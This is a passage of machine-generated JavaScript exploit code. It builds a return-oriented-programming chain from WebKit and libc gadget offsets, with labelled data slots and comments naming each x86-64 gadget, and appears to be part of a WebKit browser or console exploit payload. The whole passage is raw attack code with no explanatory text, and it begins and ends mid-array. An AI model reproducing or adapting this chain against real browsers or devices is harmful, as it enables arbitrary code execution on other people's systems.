webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4723:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4724:
db([98, 0]); // 0x62
set_gadget(libc_base+144605,); //pop rdi
//L4725:
db([98, 0]); // 0x62
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+256304, //L4729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+256272, //L4727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+256288, //L4728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4726:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4727:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4728:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4729:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+256360, //L4731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4731:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+256488, //L4733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+256504, //L4734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+256472, //L4732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4732:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4733:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4734:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+256600, //L4736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+256584, //L4735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4735:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4736:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+256680, //L4737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4737:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4739:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+256800, //L4742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+256784, //L4740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4740:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4742:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+256944, //L4745
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+256912, //L4743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+256928, //L4744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4743:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4744:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4745:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+257016, //L4747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4747:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+257072, //L4748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4748:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+257152, //L4750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4750:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4752:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+257272, //L4755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+257256, //L4753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4753:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4755:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+257416, //L4758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+257384, //L4756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+257400, //L4757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4756:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4757:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4758:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+257504, //L4760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4759:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4760:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+257560, //L4761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4761:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4763:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+257640, //L4765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4765:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+257744, //L4766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+257760, //L4767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4766:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4767:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+257848, //L4769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4769:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+257904, //L4770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4770:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+257976, //L4773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4773:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+258032, //L4774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4774:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L4717:
//L4659:
//L4505:
libc_base+764760, //pop rsi
ropchain+258120, //L4776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4776:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4778:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+258240, //L4781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+258224, //L4779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4779:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4781:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+258384, //L4784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+258352, //L4782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+258368, //L4783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4782:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4783:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4784:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+258480, //L4786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4785:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4786:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4787:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+258584, //L4788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+258600, //L4789
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4788:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4789:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+258776, //L4791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+258792, //L4792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+258760, //L4790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4790:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4791:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4792:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+258904, //L4794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+258952, //L4797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+258920, //L4795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4794:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4795:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4796:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4797:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+259064, //L4798+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+259056, //L4798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4798:
db([0, 0]); // 0x0
set_gadgets([
ropchain+259080, //L4798+24
ropchain+261088, //L4793
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+259120, //L4799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4799:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4800:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L4801:
db([48, 0]); // 0x30
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+259312, //L4805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+259280, //L4803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+259296, //L4804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4802:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4803:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4804:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4805:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+259368, //L4807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4807:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+259496, //L4809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+259512, //L4810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+259480, //L4808
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4808:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4809:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4810:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+259608, //L4812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+259592, //L4811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4811:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4812:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+259688, //L4813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4813:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4815:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+259808, //L4818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+259792, //L4816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4816:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4818:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+259952, //L4821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+259920, //L4819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+259936, //L4820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4819:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4820:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4821:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+260024, //L4823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4823:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+260080, //L4824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4824:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+260160, //L4826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4826:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4828:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+260280, //L4831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+260264, //L4829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4829:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4831:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+260424, //L4834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+260392, //L4832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+260408, //L4833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4832:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4833:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4834:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+260512, //L4836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4835:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4836:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+260568, //L4837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4837:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4839:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+260648, //L4841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4841:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+260752, //L4842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+260768, //L4843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4842:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4843:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+260856, //L4845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4845:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+260912, //L4846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4846:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+260984, //L4849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4849:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+261040, //L4850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4850:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L4793:
//L4111:
libc_base+764760, //pop rsi
ropchain+261128, //L4852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4852:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4854:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+261248, //L4857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+261232, //L4855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4855:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4857:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+261392, //L4860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+261360, //L4858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+261376, //L4859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4858:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4859:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4860:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+261488, //L4862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4861:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4862:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4863:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+261592, //L4864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+261608, //L4865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4864:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4865:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+261784, //L4867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+261800, //L4868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+261768, //L4866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4866:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4867:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4868:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+261912, //L4870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+261960, //L4873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+261928, //L4871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4870:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4871:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4872:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4873:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+262072, //L4874+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+262064, //L4874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
